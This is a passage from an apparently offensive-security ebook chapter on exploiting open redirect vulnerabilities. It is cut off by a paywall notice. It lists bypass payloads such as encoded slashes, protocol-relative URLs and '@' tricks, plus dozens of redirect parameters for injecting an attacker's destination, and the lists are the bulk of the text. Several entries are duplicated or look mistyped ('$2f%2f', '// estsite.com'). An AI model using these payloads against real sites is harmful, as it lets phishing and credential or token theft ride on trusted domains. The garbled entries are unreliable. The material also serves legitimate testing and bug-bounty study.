Exploitation

Open redirects are not complex to exploit. Once you confirm the vulnerability, you will just have to insert the destination into the request. The following are the most common redirections that you could insert in an open redirect vulnerability:

  • /%09/testsite.com
  • /%5ctestsite.com
  • //www.testsite.com/%2f%2e%2e
  • //www.testsite.com/%2e%2e
  • //testsite.com/
  • //testsite.com/%2f..
  • // estsite.com
  • /victim.com:80%40testsite.com

I also recommend you exploit the following parameters; just inject the destination in the target value:

  • ?url=http://{target}
  • ?url=https://{target}
  • ?next=http://{target}
  • ?next=https://{target}
  • ?url=https://{target}
  • ?url=http://{target}
  • ?url=//{target}
  • ?url=$2f%2f{target}
  • ?next=//{target}
  • ?next=$2f%2f{target}
  • ?url=//{target}
  • ?url=$2f%2f{target}
  • ?url=//{target}
  • /redirect/{target}
  • /cgi-bin/redirect.cgi?{target}
  • /out/{target}
  • /out?{target}
  • /out?/{target}
  • /out?//{target}
  • /out?/{target}
  • /out?///{target}
  • ?view={target}
  • ?view=/{target}
  • ?view=//{target}
  • ?view=/{target}
  • ?view=///{target}
  • /login?to={target}
  • /login?to=/{target}
  • /login?to=//{target}
  • /login?to=/{target}
  • /login?to=///{target}
..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
3.135.218.93